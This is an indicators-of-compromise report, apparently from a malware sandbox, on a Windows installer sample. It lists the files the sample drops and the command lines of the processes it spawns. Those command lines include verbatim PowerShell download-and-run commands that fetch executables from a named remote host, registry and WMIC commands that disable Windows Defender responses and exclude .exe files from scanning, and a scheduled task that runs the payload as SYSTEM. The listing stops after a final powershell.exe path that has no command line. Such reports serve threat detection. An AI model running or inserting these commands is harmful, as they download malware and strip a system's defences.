IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
 malicious
C:\ProgramData\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\i1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\i3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.0.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\wygmbcpqogng
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\SecureClient\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\System32\GroupPolicy\gpt.ini
ASCII text
dropped
 malicious
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\SGcrFlL.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\bMpBlNc.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\$Recycle.Bin\S-1-5-18\desktop.ini
Windows desktop.ini
dropped
C:\ProgramData\AQRFEVRTGL.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ATJBEMHSSB.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BJZFPPWAPT.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BKJEGDGIJECGCBGCGHDGIEGCBF
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\ProgramData\CGIDGCGIEGDGDGDGHJKKKJKECG
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\EEGWXUHVUG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EEGWXUHVUG.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EFOYFBOLXA.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EOWRVPQCCS.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\FCBAECGIEBKKFHIDAKEC
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\FIECBFID
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\ProgramData\GCGCFCBAKKFBFIECAEBAEBGCGD
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\ProgramData\GCGHCBKFCFBFHIDHDBFC
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\IIECFHDB
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\KKJKFBKKECFHJKEBKEHIDAEBKF
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xde84ae3f, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
SysEx File -
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_i1.exe_c02ec481c09e7831ff85bf9f8df2d39985ea1cb_24622bb6_851306bb-3049-4b78-87a4-d0d3d9f59764\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E9B.tmp.dmp
Mini DuMP crash report, 15 streams, Fri Apr 26 15:11:31 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER80FD.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER816C.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\NIRMEKAMZH.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NVWZAPQSQL.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NYMMPCEIMA.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NYMMPCEIMA.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\SQSJKEBWDT.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\iolo\logs\WSComm.log
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\load[1].bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\3cf7150
data
dropped
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\WMSysPr9.prx
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wqh1tun.oqa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sboifax.kbo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd4zkgva.moy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii4ymyyt.aw4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmuh1pmj.nrk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2zltvm2.0lw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orzkbwwe.ro0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vc4djh0s.pl0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxcnj0df.tn2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb12hcsw.i21.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3noldoj.f32.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zylvcivl.rjp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\f09d2dcf
data
dropped
C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\orvniumtri
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Local\Temp\tmp1FAB.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp1FBB.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp1FCC.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpC25E.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
dropped
C:\Users\user\AppData\Local\Temp\u2xs.1.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\u2xs.2\bunch.dat
data
dropped
C:\Users\user\AppData\Local\Temp\u2xs.2\whale.dbf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 14:11:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA80.tmp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk (copy)
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 14:11:20 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\bunch.dat
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\whale.dbf
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
RAGE Package Format (RPF),
dropped
C:\Windows\Tasks\biPxHmULFllsbMgnpt.job
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_dq1pym4i.djl.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_pccgaugl.z4l.ps1
ASCII text, with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
Chrome Cache Entry: 203
ASCII text, with very long lines (808)
downloaded
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
There are 100 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
 malicious
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
 malicious
C:\Users\user\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
malicious
C:\Users\user\AppData\Local\Temp\u2xs.0.exe
"C:\Users\user\AppData\Local\Temp\u2xs.0.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
"C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
malicious
C:\Users\user\AppData\Local\Temp\i3.exe
i3.exe
 malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
 malicious
C:\Users\user\AppData\Local\Temp\u2xs.3.exe
"C:\Users\user\AppData\Local\Temp\u2xs.3.exe"
malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
.\Install.exe /Bdidlg "385128" /S
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
 malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
 malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
 malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
 malicious
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
malicious
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
 malicious
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
 malicious
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
 malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F
malicious
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
malicious
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
 malicious
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn biPxHmULFllsbMgnpt
 malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
 malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn biPxHmULFllsbMgnpt
 malicious
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
 malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
